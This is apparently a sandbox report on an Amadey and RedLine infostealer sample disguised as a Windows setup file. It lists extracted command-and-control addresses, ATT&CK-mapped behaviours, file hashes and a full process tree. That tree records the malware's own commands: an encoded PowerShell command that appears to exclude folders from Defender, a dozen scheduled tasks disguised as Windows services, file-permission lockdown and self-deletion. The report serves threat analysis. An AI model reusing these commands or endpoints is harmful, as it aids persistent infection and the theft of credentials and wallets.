amadey | 40e2a4a10fafb03f8c2702b577cfd05de14fbdbd36d87d76c1a99cdf8e497dbb

Analysis

max time kernel
214s
max time network
217s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
18/03/2023, 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setu_WINFile_x64x32/Set_WINFile_x64x32.exe
Size

667.6MB
MD5

42cf398e01cf3f15dc1575bad83b703f
SHA1

d3556d724fb4fffdb256d2ceb6ae715d8663cd10
SHA256

344e36cb4ec5e07ad74f5ee8122575f872048a698d058a9d02ffe4f15f88f810
SHA512

8eb5b30cfb993d8bfaa8234b0f1856f81847ede0522c6cac7a2adaaaf9fb37119f7031c73a64ea6bec93aebf3695a380c38a999e7186323f2b0d6af954162d02
SSDEEP

3072:eD6LUbp7KirwsT3cOHC4HIr0tr19ZyUa+zqBMxvKrf+LigBh2AGloxQNwed2tsp9:O6Awi0sTMOtH6crLdkWTpLedGEgGTMQt

Score

10^/10

amadey redline infostealer spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

3.68

77.91.78.17/0jVu73d/index.php

Extracted

Family

redline

135.181.173.163:4323

Attributes

auth_value
a909e2aaecf96137978fea4f86400b9b

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ProgramStarter.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	Set_WINFile_x64x32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	ghaaer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	FixDefError.exe

Executes dropped EXE 6 IoCs

pid	Process
2484	ghaaer.exe
3296	FixDefError.exe
1112	ProgramStarter.exe
4400	DefendUpdate.exe
1436	ChromeFIX_error.exe
1496	ghaaer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023245-224.dat	upx
behavioral2/files/0x0007000000023245-237.dat	upx
behavioral2/files/0x0007000000023245-238.dat	upx
behavioral2/memory/4400-239-0x0000000000A50000-0x00000000018AF000-memory.dmp	upx
behavioral2/memory/4400-249-0x0000000000A50000-0x00000000018AF000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
82	api.ipify.org
85	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1436 set thread context of 2332	1436	ChromeFIX_error.exe	120

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3464	1436	WerFault.exe	116

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4568	schtasks.exe
4624	schtasks.exe
4324	schtasks.exe
2040	schtasks.exe
4856	schtasks.exe
3508	schtasks.exe
2076	schtasks.exe
2992	schtasks.exe
4660	schtasks.exe
3152	schtasks.exe
3692	schtasks.exe
2808	schtasks.exe
3660	schtasks.exe
2304	schtasks.exe
5072	schtasks.exe
1832	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1112	ProgramStarter.exe
2728	powershell.exe
2728	powershell.exe
2332	AppLaunch.exe
2332	AppLaunch.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	1112	ProgramStarter.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeShutdownPrivilege	3672	powercfg.exe
Token: SeCreatePagefilePrivilege	3672	powercfg.exe
Token: SeShutdownPrivilege	3368	powercfg.exe
Token: SeCreatePagefilePrivilege	3368	powercfg.exe
Token: SeShutdownPrivilege	1840	powercfg.exe
Token: SeCreatePagefilePrivilege	1840	powercfg.exe
Token: SeShutdownPrivilege	972	powercfg.exe
Token: SeCreatePagefilePrivilege	972	powercfg.exe
Token: SeShutdownPrivilege	4680	powercfg.exe
Token: SeCreatePagefilePrivilege	4680	powercfg.exe
Token: SeShutdownPrivilege	4680	powercfg.exe
Token: SeCreatePagefilePrivilege	4680	powercfg.exe
Token: SeDebugPrivilege	2332	AppLaunch.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2768 wrote to memory of 2484	2768	Set_WINFile_x64x32.exe	90
PID 2768 wrote to memory of 2484	2768	Set_WINFile_x64x32.exe	90
PID 2768 wrote to memory of 2484	2768	Set_WINFile_x64x32.exe	90
PID 2484 wrote to memory of 2040	2484	ghaaer.exe	100
PID 2484 wrote to memory of 2040	2484	ghaaer.exe	100
PID 2484 wrote to memory of 2040	2484	ghaaer.exe	100
PID 2484 wrote to memory of 220	2484	ghaaer.exe	102
PID 2484 wrote to memory of 220	2484	ghaaer.exe	102
PID 2484 wrote to memory of 220	2484	ghaaer.exe	102
PID 220 wrote to memory of 2512	220	cmd.exe	104
PID 220 wrote to memory of 2512	220	cmd.exe	104
PID 220 wrote to memory of 2512	220	cmd.exe	104
PID 220 wrote to memory of 3364	220	cmd.exe	105
PID 220 wrote to memory of 3364	220	cmd.exe	105
PID 220 wrote to memory of 3364	220	cmd.exe	105
PID 220 wrote to memory of 2380	220	cmd.exe	106
PID 220 wrote to memory of 2380	220	cmd.exe	106
PID 220 wrote to memory of 2380	220	cmd.exe	106
PID 220 wrote to memory of 1412	220	cmd.exe	107
PID 220 wrote to memory of 1412	220	cmd.exe	107
PID 220 wrote to memory of 1412	220	cmd.exe	107
PID 220 wrote to memory of 372	220	cmd.exe	108
PID 220 wrote to memory of 372	220	cmd.exe	108
PID 220 wrote to memory of 372	220	cmd.exe	108
PID 220 wrote to memory of 4760	220	cmd.exe	109
PID 220 wrote to memory of 4760	220	cmd.exe	109
PID 220 wrote to memory of 4760	220	cmd.exe	109
PID 2484 wrote to memory of 3296	2484	ghaaer.exe	110
PID 2484 wrote to memory of 3296	2484	ghaaer.exe	110
PID 2484 wrote to memory of 3296	2484	ghaaer.exe	110
PID 3296 wrote to memory of 1112	3296	FixDefError.exe	111
PID 3296 wrote to memory of 1112	3296	FixDefError.exe	111
PID 3296 wrote to memory of 1112	3296	FixDefError.exe	111
PID 2484 wrote to memory of 4400	2484	ghaaer.exe	112
PID 2484 wrote to memory of 4400	2484	ghaaer.exe	112
PID 4400 wrote to memory of 4812	4400	DefendUpdate.exe	114
PID 4400 wrote to memory of 4812	4400	DefendUpdate.exe	114
PID 2484 wrote to memory of 1436	2484	ghaaer.exe	116
PID 2484 wrote to memory of 1436	2484	ghaaer.exe	116
PID 2484 wrote to memory of 1436	2484	ghaaer.exe	116
PID 4812 wrote to memory of 1680	4812	cmd.exe	118
PID 4812 wrote to memory of 1680	4812	cmd.exe	118
PID 2484 wrote to memory of 3536	2484	ghaaer.exe	119
PID 2484 wrote to memory of 3536	2484	ghaaer.exe	119
PID 2484 wrote to memory of 3536	2484	ghaaer.exe	119
PID 1436 wrote to memory of 2332	1436	ChromeFIX_error.exe	120
PID 1436 wrote to memory of 2332	1436	ChromeFIX_error.exe	120
PID 1436 wrote to memory of 2332	1436	ChromeFIX_error.exe	120
PID 1436 wrote to memory of 2332	1436	ChromeFIX_error.exe	120
PID 1436 wrote to memory of 2332	1436	ChromeFIX_error.exe	120
PID 1112 wrote to memory of 5112	1112	ProgramStarter.exe	123
PID 1112 wrote to memory of 5112	1112	ProgramStarter.exe	123
PID 1112 wrote to memory of 5112	1112	ProgramStarter.exe	123
PID 5112 wrote to memory of 2728	5112	cmd.exe	125
PID 5112 wrote to memory of 2728	5112	cmd.exe	125
PID 5112 wrote to memory of 2728	5112	cmd.exe	125
PID 1112 wrote to memory of 1036	1112	ProgramStarter.exe	157
PID 1112 wrote to memory of 1036	1112	ProgramStarter.exe	157
PID 1112 wrote to memory of 1036	1112	ProgramStarter.exe	157
PID 1112 wrote to memory of 3600	1112	ProgramStarter.exe	126
PID 1112 wrote to memory of 3600	1112	ProgramStarter.exe	126
PID 1112 wrote to memory of 3600	1112	ProgramStarter.exe	126
PID 1112 wrote to memory of 2084	1112	ProgramStarter.exe	156
PID 1112 wrote to memory of 2084	1112	ProgramStarter.exe	156

C:\Users\Admin\AppData\Local\Temp\Setu_WINFile_x64x32\Set_WINFile_x64x32.exe
"C:\Users\Admin\AppData\Local\Temp\Setu_WINFile_x64x32\Set_WINFile_x64x32.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2768
- C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe
  "C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN ghaaer.exe /TR "C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "ghaaer.exe" /P "Admin:N"&&CACLS "ghaaer.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9580a00ee2" /P "Admin:N"&&CACLS "..\9580a00ee2" /P "Admin:R" /E&&Exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2512
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "ghaaer.exe" /P "Admin:N"
      4⤵
      PID:3364
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "ghaaer.exe" /P "Admin:R" /E
      4⤵
      PID:2380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:1412
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\9580a00ee2" /P "Admin:N"
      4⤵
      PID:372
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\9580a00ee2" /P "Admin:R" /E
      4⤵
      PID:4760
- - C:\Users\Admin\AppData\Local\Temp\1000111001\FixDefError.exe
    "C:\Users\Admin\AppData\Local\Temp\1000111001\FixDefError.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe
      "C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1112
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5112
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:3600
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:3508
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:4828
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:2076
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk572" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:1672
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk572" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:4660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk438" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:316
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk438" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:4568
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
        5⤵
        
        PID:2472
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
        6⤵
        Creates scheduled task(s)
        
        PID:4856
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:4800
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3672
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3368
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1840
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:972
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /hibernate off
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4680
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:4324
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk790" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:1508
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk790" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:3660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk921" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:4512
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk921" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:2808
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk538" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk538" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:2992
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:472
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:3152
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:4380
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:3692
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:1492
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:1832
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:3500
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:5072
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:2084
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:4624
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        5⤵
        
        PID:1036
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:2304
- - C:\Users\Admin\AppData\Local\Temp\1000112001\DefendUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\1000112001\DefendUpdate.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\1000112001\DefendUpdate.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4812
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 0
        5⤵
        
        PID:1680
- - C:\Users\Admin\AppData\Local\Temp\1000113001\ChromeFIX_error.exe
    "C:\Users\Admin\AppData\Local\Temp\1000113001\ChromeFIX_error.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 136
      4⤵
      Program crash
      PID:3464
- - C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe
    "C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe"
    3⤵
    PID:3536
- - C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe
    "C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe"
    3⤵
    PID:1776
- - C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe
    "C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe"
    3⤵
    PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1436 -ip 1436
1⤵
PID:3688

C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe
C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe
1⤵
- Executes dropped EXE
PID:1496

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000111001\FixDefError.exe

Filesize
2.3MB

MD5
1b664f2a0bede6c47e44ca8c0aad3de7

SHA1
2dc3169220411d03be438047a3c33696b4371d2b

SHA256
908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9

SHA512
f22f43e7609cbf97b5436e8185f146099ab2706f76ea0dffd3bbac20c4c940e1eda560b84ea457307ace8951234de51a3925f67fd6c47cf0917d491fded105e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000111001\FixDefError.exe

Filesize
2.3MB

MD5
1b664f2a0bede6c47e44ca8c0aad3de7

SHA1
2dc3169220411d03be438047a3c33696b4371d2b

SHA256
908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9

SHA512
f22f43e7609cbf97b5436e8185f146099ab2706f76ea0dffd3bbac20c4c940e1eda560b84ea457307ace8951234de51a3925f67fd6c47cf0917d491fded105e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000111001\FixDefError.exe

Filesize
2.3MB

MD5
1b664f2a0bede6c47e44ca8c0aad3de7

SHA1
2dc3169220411d03be438047a3c33696b4371d2b

SHA256
908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9

SHA512
f22f43e7609cbf97b5436e8185f146099ab2706f76ea0dffd3bbac20c4c940e1eda560b84ea457307ace8951234de51a3925f67fd6c47cf0917d491fded105e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000112001\DefendUpdate.exe

Filesize
4.3MB

MD5
d9c8a47ef46ec852f3eddad0ea93a799

SHA1
d8abd4904ce2a225226278556511473c1d0ea406

SHA256
ae3e61c6db3e5886a7265c46658833259e5342e0f233fd980e9b4243d16f3336

SHA512
fc8e15d901ee0050d09222c6dd8009151ca8e3683a6dd121190cde62f7583e8562213d5147abc266e5491ae244823d39c1f3e3a8f497b4ff8d7476a89ee9be27

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000112001\DefendUpdate.exe

Filesize
4.3MB

MD5
d9c8a47ef46ec852f3eddad0ea93a799

SHA1
d8abd4904ce2a225226278556511473c1d0ea406

SHA256
ae3e61c6db3e5886a7265c46658833259e5342e0f233fd980e9b4243d16f3336

SHA512
fc8e15d901ee0050d09222c6dd8009151ca8e3683a6dd121190cde62f7583e8562213d5147abc266e5491ae244823d39c1f3e3a8f497b4ff8d7476a89ee9be27

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000112001\DefendUpdate.exe

Filesize
4.3MB

MD5
d9c8a47ef46ec852f3eddad0ea93a799

SHA1
d8abd4904ce2a225226278556511473c1d0ea406

SHA256
ae3e61c6db3e5886a7265c46658833259e5342e0f233fd980e9b4243d16f3336

SHA512
fc8e15d901ee0050d09222c6dd8009151ca8e3683a6dd121190cde62f7583e8562213d5147abc266e5491ae244823d39c1f3e3a8f497b4ff8d7476a89ee9be27

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000113001\ChromeFIX_error.exe

Filesize
248KB

MD5
b3aaba3d4218355bcd25d239e2fe6ea4

SHA1
68756b3af0cc01a8d0cef2a5531fc39e0ab91817

SHA256
276f29ba1a1b953b096cda467a189ce229113847969d9b359771a5a8f41a5d15

SHA512
